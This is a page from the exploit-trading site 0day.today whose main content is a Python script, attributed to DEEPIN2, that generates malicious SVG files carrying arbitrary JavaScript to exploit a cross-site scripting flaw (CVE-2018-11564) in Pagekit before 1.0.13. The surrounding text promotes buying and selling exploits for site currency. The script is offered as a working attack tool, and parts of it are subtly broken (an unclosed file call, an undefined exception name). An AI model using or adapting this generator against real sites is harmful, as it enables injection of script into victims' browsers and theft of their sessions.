0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pagekit < 1.0.13 - Cross-Site Scripting Code Generator Exploit
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator # Author : DEEPIN2 # Vendor: Pagekit # Sotware: https://pagekit.com/ # Version: < 1.0.13 # CVE: 2018-11564 # python3 required def makesvg(name, code): code = '<exploit:script xmlns:exploit="http://www.w3.org/1999/xhtml">' + code + '</exploit:script>' f = open(name, 'w+') f.write(code) f.close if __name__ == '__main__': print(''' ______ _______ ____ ___ _ ___ _ _ ____ __ _ _ / ___\ \ / / ____| |___ \ / _ \/ |( _ ) / / | ___| / /_ | || | | | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_ | |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__ _| \____| \_/ |_____| |_____|\___/|_|\___/ |_|_|____/ \___/ |_| [*] Author : DEEPIN2(Junseo Lee)''') print('[*] enter name without extension, ex) test.svg -> test') filename = input('Filename : ') + '.svg' print('[*] If you want to use alert(), type "alert("bla..bla..")"') scriptcode = input('Script code : ') try: makesvg(filename, scriptcode) print('[+] Successfully make venom file "%s"' %filename) except Error as e: print(e) # 0day.today [2024-11-16] #